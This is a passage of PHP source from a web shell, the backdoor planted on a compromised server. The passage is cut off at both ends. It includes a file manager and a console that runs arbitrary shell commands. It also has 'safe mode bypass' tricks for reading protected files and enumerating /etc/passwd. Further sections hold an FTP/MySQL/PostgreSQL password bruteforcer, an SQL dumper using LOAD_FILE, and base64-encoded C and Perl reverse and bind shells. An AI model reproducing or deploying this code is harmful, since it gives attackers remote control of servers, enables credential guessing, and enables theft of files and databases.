highlight_file($_POST[\'p1\'],true); \r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\'; \r\n } \r\n break; \r\n case \'chmod\': \r\n if( !empty($_POST[\'p3\']) ) { \r\n $perms = 0; \r\n for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i) \r\n $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1)); \r\n if(!@chmod($_POST[\'p1\'], $perms)) \r\n echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";</script>\'; \r\n else \r\n die(\'<script>g(null,null,null,null,"")</script>\'); \r\n } \r\n echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\'; \r\n break; \r\n case \'edit\': \r\n if( !is_writable($_POST[\'p1\'])) { \r\n echo \'File isn\\\'t writeable\'; \r\n break; \r\n } \r\n if( !empty($_POST[\'p3\']) ) { \r\n @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']); \r\n echo \'Saved!<br><script>document.mf.p3.value="";</script>\'; \r\n } \r\n echo \'<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>\'; \r\n $fp = @fopen($_POST[\'p1\'], \'r\'); \r\n if($fp) { \r\n while( !@feof($fp) ) \r\n echo htmlspecialchars(@fread($fp, 1024)); \r\n @fclose($fp); \r\n } \r\n echo \'</textarea><input type=submit value=">>"></form>\'; \r\n break; \r\n case \'hexdump\': \r\n $c = @file_get_contents($_POST[\'p1\']); \r\n $n = 0; \r\n $h = array(\'00000000<br>\',\'\',\'\'); \r\n $len = strlen($c); \r\n for ($i=0; $i<$len; ++$i) { \r\n $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \'; \r\n switch ( ord($c[$i]) ) { \r\n case 0: $h[2] .= \' \'; break; \r\n case 9: $h[2] .= \' \'; break; \r\n case 10: $h[2] .= \' \'; break; \r\n case 13: $h[2] .= \' \'; break; \r\n default: $h[2] .= $c[$i]; break; \r\n } \r\n $n++; \r\n if ($n == 32) { \r\n $n = 0; \r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';} \r\n $h[1] .= \'<br>\'; \r\n $h[2] .= "\\n"; \r\n } \r\n } \r\n echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\'; \r\n break; \r\n case \'rename\': \r\n if( !empty($_POST[\'p3\']) ) { \r\n if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) \r\n echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";</script>\'; \r\n else \r\n die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\'); \r\n } \r\n echo \'<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\'; \r\n break; \r\n case \'touch\': \r\n if( !empty($_POST[\'p3\']) ) { \r\n $time = strtotime($_POST[\'p3\']); \r\n if($time) { \r\n if(@touch($_POST[\'p1\'],$time,$time)) \r\n die(\'<script>g(null,null,null,null,"")</script>\'); \r\n else { \r\n echo \'Fail!<script>document.mf.p3.value="";</script>\'; \r\n } \r\n } else echo \'Bad time format!<script>document.mf.p3.value="";</script>\'; \r\n } \r\n echo \'<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\'; \r\n break; \r\n case \'mkfile\': \r\n \r\n break; \r\n } \r\n echo \'</div>\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionSafeMode() { \r\n $temp=\'\'; \r\n ob_start(); \r\n switch($_POST[\'p1\']) { \r\n case 1: \r\n $temp=@tempnam($test, \'cx\'); \r\n if(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){ \r\n echo @file_get_contents($temp); \r\n unlink($temp); \r\n } else \r\n echo \'Sorry... Can\\\'t open file\'; \r\n break; \r\n case 2: \r\n $files = glob($_POST[\'p2\'].\'*\'); \r\n if( is_array($files) ) \r\n foreach ($files as $filename) \r\n echo $filename."\\n"; \r\n break; \r\n case 3: \r\n $ch = curl_init("file://".$_POST[\'p2\']."\\x00".SELF_PATH); \r\n curl_exec($ch); \r\n break; \r\n case 4: \r\n ini_restore("safe_mode"); \r\n ini_restore("open_basedir"); \r\n include($_POST[\'p2\']); \r\n break; \r\n case 5: \r\n for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) { \r\n $uid = @posix_getpwuid($_POST[\'p2\']); \r\n if ($uid) \r\n echo join(\':\',$uid)."\\n"; \r\n } \r\n break; \r\n case 6: \r\n if(!function_exists(\'imap_open\'))break; \r\n $stream = imap_open($_POST[\'p2\'], "", ""); \r\n if ($stream == FALSE) \r\n break; \r\n echo imap_body($stream, 1); \r\n imap_close($stream); \r\n break; \r\n } \r\n $temp = ob_get_clean(); \r\n printHeader(); \r\n echo \'<h1>Safe mode bypass</h1><div class=content>\'; \r\n echo \'<span>Copy (read file)</span><form onsubmit=\\\'g(null,null,"1",this.param.value);return false;\\\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\\\'g(null,null,"2",this.param.value);return false;\\\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\\\'g(null,null,"3",this.param.value);return false;\\\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\\\'g(null,null,"4",this.param.value);return false;\\\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\\\'g(null,null,"5",this.param1.value,this.param2.value);return false;\\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\\\'g(null,null,"6",this.param.value);return false;\\\'><input type=text name=param><input type=submit value=">>"></form>\'; \r\n if($temp) \r\n echo \'<pre class="ml1" style="margin-top:5px" id="Output">\'.$temp.\'</pre>\'; \r\n echo \'</div>\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionConsole() { \r\n if(isset($_POST[\'ajax\'])) { \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true; \r\n ob_start(); \r\n echo "document.cf.cmd.value=\'\';\\n"; \r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0")); \r\n if(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match)) { \r\n if(@chdir($match[1])) { \r\n $GLOBALS[\'cwd\'] = @getcwd(); \r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';"; \r\n } \r\n } \r\n echo "document.cf.output.value+=\'".$temp."\';"; \r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; \r\n $temp = ob_get_clean(); \r\n echo strlen($temp), "\\n", $temp; \r\n exit; \r\n } \r\n printHeader(); \r\n?> \r\n<script> \r\nif(window.Event) window.captureEvents(Event.KEYDOWN); \r\nvar cmds = new Array(""); \r\nvar cur = 0; \r\nfunction kp(e) { \r\n var n = (window.Event) ? e.which : e.keyCode; \r\n if(n == 38) { \r\n cur--; \r\n if(cur>=0) \r\n document.cf.cmd.value = cmds[cur]; \r\n else \r\n cur++; \r\n } else if(n == 40) { \r\n cur++; \r\n if(cur < cmds.length) \r\n document.cf.cmd.value = cmds[cur]; \r\n else \r\n cur--; \r\n } \r\n} \r\nfunction add(cmd) { \r\n cmds.pop(); \r\n cmds.push(cmd); \r\n cmds.push(""); \r\n cur = cmds.length-1; \r\n} \r\n</script> \r\n<?php \r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';document.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>\'; \r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { \r\n if($v == \'\') { \r\n echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\'; \r\n continue; \r\n } \r\n echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\'; \r\n } \r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false; \r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>\'; \r\n if(!empty($_POST[\'p1\'])) { \r\n echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\'])); \r\n } \r\n echo \'</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">\'; \r\n echo \'</form></div><script>document.cf.cmd.focus();</script>\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionLogout() { \r\n unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]); \r\n echo \'bye!\'; \r\n} \r\n\r\nfunction actionSelfRemove() { \r\n printHeader(); \r\n if($_POST[\'p1\'] == \'yes\') { \r\n if(@unlink(SELF_PATH)) \r\n die(\'Shell has been removed\'); \r\n else \r\n echo \'unlink error!\'; \r\n } \r\n echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionBruteforce() { \r\n printHeader(); \r\n if( isset($_POST[\'proto\']) ) { \r\n echo \'<h1>Results</h1><div class=content><span>Type:</span> \'.htmlspecialchars($_POST[\'proto\']).\' <span>Server:</span> \'.htmlspecialchars($_POST[\'server\']).\'<br>\'; \r\n if( $_POST[\'proto\'] == \'ftp\' ) { \r\n function bruteForce($ip,$port,$login,$pass) { \r\n $fp = @ftp_connect($ip, $port?$port:21); \r\n if(!$fp) return false; \r\n $res = @ftp_login($fp, $login, $pass); \r\n @ftp_close($fp); \r\n return $res; \r\n } \r\n } elseif( $_POST[\'proto\'] == \'mysql\' ) { \r\n function bruteForce($ip,$port,$login,$pass) { \r\n $res = @mysql_connect($ip.\':\'.$port?$port:3306, $login, $pass); \r\n @mysql_close($res); \r\n return $res; \r\n } \r\n } elseif( $_POST[\'proto\'] == \'pgsql\' ) { \r\n function bruteForce($ip,$port,$login,$pass) { \r\n $str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=\'\'"; \r\n $res = @pg_connect($server[0].\':\'.$server[1]?$server[1]:5432, $login, $pass); \r\n @pg_close($res); \r\n return $res; \r\n } \r\n } \r\n $success = 0; \r\n $attempts = 0; \r\n $server = explode(":", $_POST[\'server\']); \r\n if($_POST[\'type\'] == 1) { \r\n $temp = @file(\'/etc/passwd\'); \r\n if( is_array($temp) ) \r\n foreach($temp as $line) { \r\n $line = explode(":", $line); \r\n ++$attempts; \r\n if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { \r\n $success++; \r\n echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($line[0]).\'<br>\'; \r\n } \r\n if(@$_POST[\'reverse\']) { \r\n $tmp = ""; \r\n for($i=strlen($line[0])-1; $i>=0; --$i) \r\n $tmp .= $line[0][$i]; \r\n ++$attempts; \r\n if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { \r\n $success++; \r\n echo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($tmp); \r\n } \r\n } \r\n } \r\n } elseif($_POST[\'type\'] == 2) { \r\n $temp = @file($_POST[\'dict\']); \r\n if( is_array($temp) ) \r\n foreach($temp as $line) { \r\n $line = trim($line); \r\n ++$attempts; \r\n if( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) { \r\n $success++; \r\n echo \'<b>\'.htmlspecialchars($_POST[\'login\']).\'</b>:\'.htmlspecialchars($line).\'<br>\'; \r\n } \r\n } \r\n } \r\n echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; \r\n } \r\n echo \'<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>\' \r\n .\'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>\' \r\n .\'<input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\' \r\n .\'<input type=hidden name=a value="\'.htmlspecialchars($_POST[\'a\']).\'">\' \r\n .\'<input type=hidden name=charset value="\'.htmlspecialchars($_POST[\'charset\']).\'">\' \r\n .\'<span>Server:port</span></td>\' \r\n .\'<td><input type=text name=server value="127.0.0.1"></td></tr>\' \r\n .\'<tr><td><span>Brute type</span></td>\' \r\n .\'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>\' \r\n .\'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>\' \r\n .\'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>\' \r\n .\'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>\' \r\n .\'<td><input type=text name=login value="komsen"></td></tr>\' \r\n .\'<tr><td><span>Dictionary</span></td>\' \r\n .\'<td><input type=text name=dict value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'passwd.dic"></td></tr></table>\' \r\n .\'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>\'; \r\n echo \'</div><br>\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionSql() { \r\n class DbClass { \r\n var $type; \r\n var $link; \r\n var $res; \r\n function DbClass($type) { \r\n $this->type = $type; \r\n } \r\n function connect($host, $user, $pass, $dbname){ \r\n switch($this->type) { \r\n case \'mysql\': \r\n if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; \r\n break; \r\n case \'pgsql\': \r\n $host = explode(\':\', $host); \r\n if(!$host[1]) $host[1]=5432; \r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; \r\n break; \r\n } \r\n return false; \r\n } \r\n function selectdb($db) { \r\n switch($this->type) { \r\n case \'mysql\': \r\n if (@mysql_select_db($db))return true; \r\n break; \r\n } \r\n return false; \r\n } \r\n function query($str) { \r\n switch($this->type) { \r\n case \'mysql\': \r\n return $this->res = @mysql_query($str); \r\n break; \r\n case \'pgsql\': \r\n return $this->res = @pg_query($this->link,$str); \r\n break; \r\n } \r\n return false; \r\n } \r\n function fetch() { \r\n $res = func_num_args()?func_get_arg(0):$this->res; \r\n switch($this->type) { \r\n case \'mysql\': \r\n return @mysql_fetch_assoc($res); \r\n break; \r\n case \'pgsql\': \r\n return @pg_fetch_assoc($res); \r\n break; \r\n } \r\n return false; \r\n } \r\n function listDbs() { \r\n switch($this->type) { \r\n case \'mysql\': \r\n return $this->res = @mysql_list_dbs($this->link); \r\n break; \r\n case \'pgsql\': \r\n return $this->res = $this->query("SELECT datname FROM pg_database"); \r\n break; \r\n } \r\n return false; \r\n } \r\n function listTables() { \r\n switch($this->type) { \r\n case \'mysql\': \r\n return $this->res = $this->query(\'SHOW TABLES\'); \r\n break; \r\n case \'pgsql\': \r\n return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'"); \r\n break; \r\n } \r\n return false; \r\n } \r\n function error() { \r\n switch($this->type) { \r\n case \'mysql\': \r\n return @mysql_error($this->link); \r\n break; \r\n case \'pgsql\': \r\n return @pg_last_error($this->link); \r\n break; \r\n } \r\n return false; \r\n } \r\n function setCharset($str) { \r\n switch($this->type) { \r\n case \'mysql\': \r\n if(function_exists(\'mysql_set_charset\')) \r\n return @mysql_set_charset($str, $this->link); \r\n else \r\n $this->query(\'SET CHARSET \'.$str); \r\n break; \r\n case \'mysql\': \r\n return @pg_set_client_encoding($this->link, $str); \r\n break; \r\n } \r\n return false; \r\n } \r\n function dump($table) { \r\n switch($this->type) { \r\n case \'mysql\': \r\n $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\'); \r\n $create = mysql_fetch_array($res); \r\n echo $create[1].";\\n\\n"; \r\n $this->query(\'SELECT * FROM `\'.$table.\'`\'); \r\n while($item = $this->fetch()) { \r\n $columns = array(); \r\n foreach($item as $k=>$v) { \r\n $item[$k] = "\'".@mysql_real_escape_string($v)."\'"; \r\n $columns[] = "`".$k."`"; \r\n } \r\n echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n"; \r\n } \r\n break; \r\n case \'pgsql\': \r\n $this->query(\'SELECT * FROM \'.$table); \r\n while($item = $this->fetch()) { \r\n $columns = array(); \r\n foreach($item as $k=>$v) { \r\n $item[$k] = "\'".addslashes($v)."\'"; \r\n $columns[] = $k; \r\n } \r\n echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n"; \r\n } \r\n break; \r\n } \r\n return false; \r\n } \r\n }; \r\n $db = new DbClass($_POST[\'type\']); \r\n if(@$_POST[\'p2\']==\'download\') { \r\n ob_start("ob_gzhandler", 4096); \r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']); \r\n $db->selectdb($_POST[\'sql_base\']); \r\n header("Content-Disposition: attachment; filename=dump.sql"); \r\n header("Content-Type: text/plain"); \r\n foreach($_POST[\'tbl\'] as $v) \r\n $db->dump($v); \r\n exit; \r\n } \r\n printHeader(); \r\n ?> \r\n <h1>Sql browser</h1><div class=content> \r\n <form name="sf" method="post"> \r\n <table cellpadding="2" cellspacing="0"> \r\n <tr> \r\n <td>Type</td> \r\n <td>Host</td> \r\n <td>Login</td> \r\n <td>Password</td> \r\n <td>Database</td> \r\n <td></td> \r\n\r\n </tr> \r\n <tr> \r\n <input type=hidden name=a value=Sql> \r\n <input type=hidden name=p1 value=\'query\'> \r\n <input type=hidden name=p2> \r\n <input type=hidden name=c value=\'<?=htmlspecialchars($GLOBALS[\'cwd\']);?>\'> \r\n <input type=hidden name=charset value=\'<?=isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\'?>\'> \r\n <td> \r\n <select name=\'type\'> \r\n <option value="mysql" <?php if(@$_POST[\'type\']==\'mysql\')echo \'selected\';?>>MySql</option> \r\n <option value="pgsql" <?php if(@$_POST[\'type\']==\'pgsql\')echo \'selected\';?>>PostgreSql</option> \r\n </select></td> \r\n <td><input type=text name=sql_host value=\'<?=(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\']));?>\'></td> \r\n <td><input type=text name=sql_login value=\'<?=(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\']));?>\'></td> \r\n <td><input type=text name=sql_pass value=\'<?=(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\']));?>\'></td> \r\n <td> \r\n <?php \r\n $tmp = "<input type=text name=sql_base value=\'\'>"; \r\n if(isset($_POST[\'sql_host\'])){ \r\n if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { \r\n switch($_POST[\'charset\']) { \r\n case "Windows-1251": $db->setCharset(\'cp1251\'); break; \r\n case "UTF-8": $db->setCharset(\'utf8\'); break; \r\n case "KOI8-R": $db->setCharset(\'koi8r\'); break; \r\n case "KOI8-U": $db->setCharset(\'koi8u\'); break; \r\n case "cp866": $db->setCharset(\'cp866\'); break; \r\n } \r\n $db->listDbs(); \r\n echo "<select name=sql_base><option value=\'\'></option>"; \r\n while($item = $db->fetch()) { \r\n list($key, $value) = each($item); \r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\'; \r\n } \r\n echo \'</select>\'; \r\n } \r\n else echo $tmp; \r\n }else \r\n echo $tmp; \r\n ?></td> \r\n <td><input type=submit value=">>"></td> \r\n </tr> \r\n </table> \r\n <script> \r\n function st(t,l) { \r\n document.sf.p1.value = \'select\'; \r\n document.sf.p2.value = t; \r\n if(l!=null)document.sf.p3.value = l; \r\n document.sf.submit(); \r\n } \r\n function is() { \r\n for(i=0;i<document.sf.elements[\'tbl[]\'].length;++i) \r\n document.sf.elements[\'tbl[]\'][i].checked = !document.sf.elements[\'tbl[]\'][i].checked; \r\n } \r\n </script> \r\n <?php \r\n if(isset($db) && $db->link){ \r\n echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; \r\n if(!empty($_POST[\'sql_base\'])){ \r\n $db->selectdb($_POST[\'sql_base\']); \r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;border-right:2px solid #666;\'><span>Tables:</span><br><br>"; \r\n $tbls_res = $db->listTables(); \r\n while($item = $db->fetch($tbls_res)) { \r\n list($key, $value) = each($item); \r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\')); \r\n $value = htmlspecialchars($value); \r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> <a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } \r\n echo "<input type=\'checkbox\' onclick=\'is();\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";document.sf.submit();\'></td><td style=\'border-top:2px solid #666;\'>"; \r\n if(@$_POST[\'p1\'] == \'select\') { \r\n $_POST[\'p1\'] = \'query\'; \r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\'); \r\n $num = $db->fetch(); \r\n $num = $num[\'n\']; \r\n echo "<span>".$_POST[\'p2\']."</span> ($num) "; \r\n for($i=0;$i<($num/30);$i++) \r\n if($i != (int)$_POST[\'p3\']) \r\n echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> "; \r\n else \r\n echo ($i+1)," "; \r\n if($_POST[\'type\']==\'pgsql\') \r\n $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30); \r\n else \r\n $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\'; \r\n echo "<br><br>"; \r\n } \r\n if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { \r\n $db->query(@$_POST[\'p3\']); \r\n if($db->res !== false) { \r\n $title = false; \r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\'; \r\n $line = 1; \r\n while($item = $db->fetch()) { \r\n if(!$title) { \r\n echo \'<tr>\'; \r\n foreach($item as $key => $value) \r\n echo \'<th>\'.$key.\'</th>\'; \r\n reset($item); \r\n $title=true; \r\n echo \'</tr><tr>\'; \r\n $line = 2; \r\n } \r\n echo \'<tr class="l\'.$line.\'">\'; \r\n $line = $line==1?2:1; \r\n foreach($item as $key => $value) { \r\n if($value == null) \r\n echo \'<td><i>null</i></td>\'; \r\n else \r\n echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\'; \r\n } \r\n echo \'</tr>\'; \r\n } \r\n echo \'</table>\'; \r\n } else { \r\n echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\'; \r\n } \r\n } \r\n echo "<br><textarea name=\'p3\' style=\'width:100%;height:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>"; \r\n echo "</td></tr>"; \r\n } \r\n echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>"; \r\n if(@$_POST[\'p1\'] == \'loadfile\') { \r\n $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file"); \r\n $file = $db->fetch(); \r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } \r\n } \r\n echo \'</div>\'; \r\n printFooter(); \r\n} \r\nfunction actionNetwork() { \r\n printHeader(); \r\n $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; \r\n $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; \r\n $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCk